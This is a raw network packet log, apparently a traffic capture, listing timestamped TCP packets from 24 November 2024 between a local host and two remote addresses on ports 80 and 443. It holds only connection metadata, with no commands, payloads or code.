                                                                                                                                                                                              Nov 24, 2024 13:39:28.200371027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.201294899 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.201314926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.201339006 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.202272892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.202357054 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.202387094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.203229904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.203368902 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.203372955 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.204257965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.204307079 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.204360008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.205233097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.205317020 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.205339909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.206226110 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.206290960 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.206336975 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.207201958 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.207258940 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.207321882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.208261013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.208308935 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.208350897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.209214926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.209273100 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.209346056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.210186958 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.210232019 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.210284948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.211193085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.211221933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.211244106 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.212189913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.212240934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.212301016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.213161945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.213208914 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.213290930 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.214210987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.214262009 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.214560986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.215152025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.215204000 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.215248108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.216114998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.216171980 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.216197014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.217164040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.217212915 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.217323065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.218405008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.218452930 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.218503952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.219110966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.219156981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.219177961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.220218897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.220381021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.221215010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.221313000 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.222091913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.222275019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.223149061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.223350048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.224232912 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.224314928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.225240946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.225442886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.226121902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.226252079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.226687908 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.227013111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.227067947 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.227112055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.228066921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.228117943 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.228180885 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.229034901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.229079962 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.229132891 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.230015993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.230063915 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.230098009 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.276966095 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.311053038 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.312269926 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.312308073 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.312805891 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.312813997 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.353519917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.353602886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.353672028 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.354068041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.354176044 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.354223967 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.354970932 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.355082035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.355125904 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.355957031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.377127886 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.377661943 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.377696037 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.378163099 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.378170013 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392505884 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392601013 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392635107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392774105 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392817974 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392879009 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392949104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.392993927 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.393908024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.393950939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.393996954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.394675970 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.394783020 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.394829035 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.395555973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.395601988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.395654917 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.396524906 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.396645069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.396693945 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.397572041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.397658110 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.397706985 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.398497105 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.398622990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.398670912 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.399558067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.399656057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.399730921 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.400491953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.400614977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.400659084 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.401470900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.401618004 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.401664972 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.402497053 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.402669907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.402712107 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.403486013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.403597116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.403631926 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.404508114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.404607058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.404653072 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.405495882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.405561924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.405601978 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.406481028 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.406572104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.406611919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.407485962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.407603979 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.407644987 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.408432007 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.408530951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.408571959 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.409460068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.409497023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.409554005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.410521030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.410598993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.410644054 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.411762953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.411854982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.412028074 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.412678957 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.412736893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.412779093 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.413507938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.413587093 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.413625956 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.414386034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.414480925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.414521933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.415437937 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.415493965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.415568113 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.416359901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.416471958 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.416512966 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.417354107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.417457104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.417498112 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.418365955 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.418493032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.418540955 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.419357061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.419454098 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.419519901 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.420327902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.420403004 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.420453072 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.421338081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.421464920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.421513081 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.422327042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.422410011 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.422457933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.423356056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.423408031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.423455954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.424278021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.424335003 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.424375057 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.425307035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.425345898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.425390959 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.426281929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.426336050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.426373005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.427293062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.427406073 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.427448988 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.428313971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.428416014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.428466082 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.429265976 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.429374933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.429414034 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.430253983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.430367947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.430497885 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.431251049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.431339979 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.431379080 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.432224989 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.432332039 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.432372093 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.432768106 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.433326960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.433374882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.433413982 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.434220076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.434294939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.434334993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.435221910 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.435360909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.435405970 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.436197996 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.436309099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.436383963 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.437290907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.437561035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.437602043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.438755035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.438869953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.438914061 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.440288067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.440423012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.440479040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.440865993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.441723108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.441781044 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.441817999 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.443057060 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.443542004 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.443567038 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.444005013 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.444009066 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.449040890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.452665091 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.453032017 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.453062057 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.453603029 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.453608990 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.563905954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.564011097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.564209938 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.564409018 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.564502001 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.564542055 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.565421104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.565519094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.565557957 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.566342115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.602715015 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.602813005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.602984905 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.602998018 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.603079081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.603127956 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.603754997 CET8049752185.215.113.16192.168.2.6
